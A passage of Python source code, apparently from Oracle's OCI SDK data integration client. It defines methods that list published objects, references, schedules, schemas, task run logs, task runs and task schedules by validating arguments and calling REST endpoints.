Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PublishedObjectSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_published_objects.py.html>`__ to see an example of how to use list_published_objects API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/publishedObjects"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"fields",
"name",
"identifier",
"type",
"type_in_subtree",
"limit",
"page",
"sort_order",
"sort_by",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_published_objects got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"typeInSubtree": kwargs.get("type_in_subtree", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObjectSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="PublishedObjectSummaryCollection")
def list_references(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of references in an application. Reference objects are created when dataflows and tasks use objects, such as data assets and connections.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str name: (optional)
Used to filter by the name of the object.
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ReferenceSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_references.py.html>`__ to see an example of how to use list_references API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/references"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"limit",
"page",
"name",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_references got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"name": kwargs.get("name", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ReferenceSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ReferenceSummaryCollection")
def list_schedules(self, workspace_id, application_key, **kwargs):
"""
Use this endpoint to list schedules.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] type: (optional)
Used to filter by the object type of the object. It can be suffixed with an optional filter operator InSubtree. If this operator is not specified, then exact match is considered. <br><br><B>Examples:</B><br> <ul> <li><B>?type=DATA_LOADER_TASK&typeInSubtree=false</B> returns all objects of type data loader task</li> <li><B>?type=DATA_LOADER_TASK</B> returns all objects of type data loader task</li> <li><B>?type=DATA_LOADER_TASK&typeInSubtree=true</B> returns all objects of type data loader task</li> </ul>
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ScheduleSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_schedules.py.html>`__ to see an example of how to use list_schedules API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/schedules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"type",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_schedules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"type": self.base_client.generate_collection_format_param(kwargs.get("type", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ScheduleSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="ScheduleSummaryCollection")
def list_schemas(self, workspace_id, connection_key, schema_resource_name, **kwargs):
"""
Retrieves a list of all the schemas that can be accessed using the specified connection.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
Schema resource name used for retrieving schemas.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str name: (optional)
Used to filter by the name of the object.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] name_list: (optional)
Used to filter by the name of the object.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.SchemaSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_schemas.py.html>`__ to see an example of how to use list_schemas API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"page",
"limit",
"fields",
"sort_by",
"sort_order",
"name",
"opc_request_id",
"name_list"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_schemas got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"schemaResourceName": schema_resource_name,
"name": kwargs.get("name", missing),
"nameList": self.base_client.generate_collection_format_param(kwargs.get("name_list", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="SchemaSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="SchemaSummaryCollection")
def list_task_run_logs(self, workspace_id, application_key, task_run_key, **kwargs):
"""
Gets log entries for task runs using its key.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str task_run_key: (required)
The task run key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.data_integration.models.TaskRunLogSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_run_logs.py.html>`__ to see an example of how to use list_task_run_logs API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns/{taskRunKey}/logs"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"page",
"limit",
"sort_order",
"sort_by"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_run_logs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"taskRunKey": task_run_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[TaskRunLogSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[TaskRunLogSummary]")
def list_task_runs(self, workspace_id, application_key, **kwargs):
"""
Retrieves a list of task runs and provides options to filter the list.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param str aggregator_key: (optional)
Used to filter by the project or the folder object.
:param list[str] fields: (optional)
Specifies the fields to get for an object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param list[str] filter: (optional)
This filter parameter can be used to filter by model specific queryable fields of the object <br><br><B>Examples:-</B><br> <ul> <li><B>?filter=status eq Failed</B> returns all objects that have a status field with value Failed</li> </ul>
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskRunSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_runs.py.html>`__ to see an example of how to use list_task_runs API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskRuns"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"key",
"aggregator_key",
"fields",
"name",
"identifier",
"page",
"limit",
"sort_order",
"sort_by",
"filter"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_runs got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
query_params = {
"key": self.base_client.generate_collection_format_param(kwargs.get("key", missing), 'multi'),
"aggregatorKey": kwargs.get("aggregator_key", missing),
"fields": self.base_client.generate_collection_format_param(kwargs.get("fields", missing), 'multi'),
"name": kwargs.get("name", missing),
"identifier": self.base_client.generate_collection_format_param(kwargs.get("identifier", missing), 'multi'),
"page": kwargs.get("page", missing),
"limit": kwargs.get("limit", missing),
"sortOrder": kwargs.get("sort_order", missing),
"sortBy": kwargs.get("sort_by", missing),
"filter": self.base_client.generate_collection_format_param(kwargs.get("filter", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskRunSummaryCollection")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="TaskRunSummaryCollection")
def list_task_schedules(self, workspace_id, application_key, **kwargs):
"""
This endpoint can be used to get the list of all the TaskSchedule objects.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param list[str] key: (optional)
Used to filter by the key of the object.
:param str name: (optional)
Used to filter by the name of the object.
:param list[str] identifier: (optional)
Used to filter by the identifier of the object.
:param list[str] type: (optional)
Used to filter by the object type of the object. It can be suffixed with an optional filter operator InSubtree. If this operator is not specified, then exact match is considered. <br><br><B>Examples:</B><br> <ul> <li><B>?type=DATA_LOADER_TASK&typeInSubtree=false</B> returns all objects of type data loader task</li> <li><B>?type=DATA_LOADER_TASK</B> returns all objects of type data loader task</li> <li><B>?type=DATA_LOADER_TASK&typeInSubtree=true</B> returns all objects of type data loader task</li> </ul>
:param str page: (optional)
For list pagination. The value for this parameter is the `opc-next-page` or the `opc-prev-page` response header from the previous `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param int limit: (optional)
Sets the maximum number of results per page, or items to return in a paginated `List` call. See `List Pagination`__.
__ https://docs.cloud.oracle.com/iaas/Content/API/Concepts/usingapi.htm#nine
:param str sort_by: (optional)
Specifies the field to sort by. Accepts only one field. By default, when you sort by time fields, results are shown in descending order. All other fields default to ascending order. Sorting related parameters are ignored when parameter `query` is present (search operation and sorting order is by relevance score in descending order).
Allowed values are: "TIME_CREATED", "DISPLAY_NAME"
:param str sort_order: (optional)
Specifies sort order to use, either `ASC` (ascending) or `DESC` (descending).
Allowed values are: "ASC", "DESC"
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param bool is_enabled: (optional)
This filter parameter can be used to filter task schedule by its state.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.TaskScheduleSummaryCollection`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/list_task_schedules.py.html>`__ to see an example of how to use list_task_schedules API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/taskSchedules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"key",
"name",
"identifier",
"type",
"page",
"limit",
"sort_by",
"sort_order",
"opc_request_id",
"is_enabled"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_task_schedules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["TIME_CREATED", "DISPLAY_NAME"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
